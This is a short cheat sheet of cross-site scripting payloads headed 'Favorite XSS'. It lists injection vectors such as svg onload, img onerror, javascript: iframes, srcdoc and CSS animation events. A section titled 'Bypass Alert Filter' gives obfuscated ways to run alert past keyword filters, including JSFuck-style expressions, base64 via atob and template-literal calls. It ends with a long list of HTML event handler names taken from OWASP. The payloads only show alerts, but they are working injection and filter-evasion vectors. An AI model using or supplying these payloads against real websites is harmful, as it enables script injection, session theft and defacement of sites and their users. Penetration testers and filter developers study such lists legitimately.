Favorite XSS

<script src=data:&comma;alert(1)//></script>
<svg/onload=alert(45)>
<img src=z onerror=alert(45)>
<iframe src=“javascript:alert(45)”></iframe>
<svg </onload ="1> (_=prompt,_(45)) "">
<script/"<a"/src=data:=".<a,[45].some(alert)></script>

<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart="alert('45')"></div>

<html:html xmlns:html=‘http://www.w3.org/1999/xhtml’><html:script>alert('XSS')</html:script></html:html>

<svg^Lonload=alert(45)>
<!— ^L is x0c —>

<iframe src="" srcdoc="<script>alert(45)</script>"></iframe>

Bypass Alert Filter

alert(45)
alert`45`
prompt(45)
prompt`45`
confirm()
confirm`45`
[45].some.alert()

#
    var fn=window[490837..toString(1<<5)];
    fn(atob('YWxlcnQoMSk='));

#
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))

#
Array.from`45${alert}47${window}46`
Array.from([45],alert)

#
Promise.reject("45").then(null,alert)

# 
'str1ng'.replace(/45/,alert)

#
Set.constructor`alert\x2845\x29```

#
var a = onerror=alert;throw document.location;

Event Handlers

(https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Event_Handlers)

FSCommand()
onAnimationsstart()
onAbort()
onActivate()
onAfterPrint()
onAfterUpdate()
onBeforeActivate()
onBeforeCopy()
onBeforeCut()
onBeforeDeactivate()
onBeforeEditFocus()
onBeforePaste()
onBeforePrint()
onBeforeUnload()
onBeforeUpdate()
onBegin()
onBlur()
onBounce()
onCellChange()
onChange()
onClick()
onContextMenu()
onControlSelect()
onCopy()
onCut()
onDataAvailable()
onDataSetChanged()
onDataSetComplete()
onDblClick()
onDeactivate()
onDrag()
onDragEnd()
onDragLeave()
onDragEnter()
onDragOver()
onDragDrop()
onDragStart()
onDrop()
onEnd()
onError()
onErrorUpdate()
onFilterChange()
onFinish()
onFocus()
onFocusIn()
onFocusOut()
onHashChange()
onHelp()
onInput()
onKeyDown()
onKeyPress()
onKeyUp()
onLayoutComplete()
onLoad()
onLoseCapture()
onMediaComplete()
onMediaError()
onMessage()
onMouseDown()
onMouseEnter()
onMouseLeave()
onMouseMove()
onMouseOut()
onMouseOver()
onMouseUp()
onMouseWheel()
onMove()
onMoveEnd()
onMoveStart()
onOffline()
onOnline()
onOutOfSync()
onPaste()
onPause()
onPopState()
onProgress()
onPropertyChange()
onReadyStateChange()
onRedo()
onRepeat()
onReset()
onResize()
onResizeEnd()
onResizeStart()
onResume()
onReverse()
onRowsEnter()
onRowExit()
onRowDelete()
onRowInserted()
onScroll()
onSeek()
onSelect()
onSelectionChange()
onSelectStart()
onStart()
onStop()
onStorage()
onSyncRestored()
onSubmit()
onTimeError()
onTrackChange()
onUndo()
onUnload()
onURLFlip()
seekSegmentTime()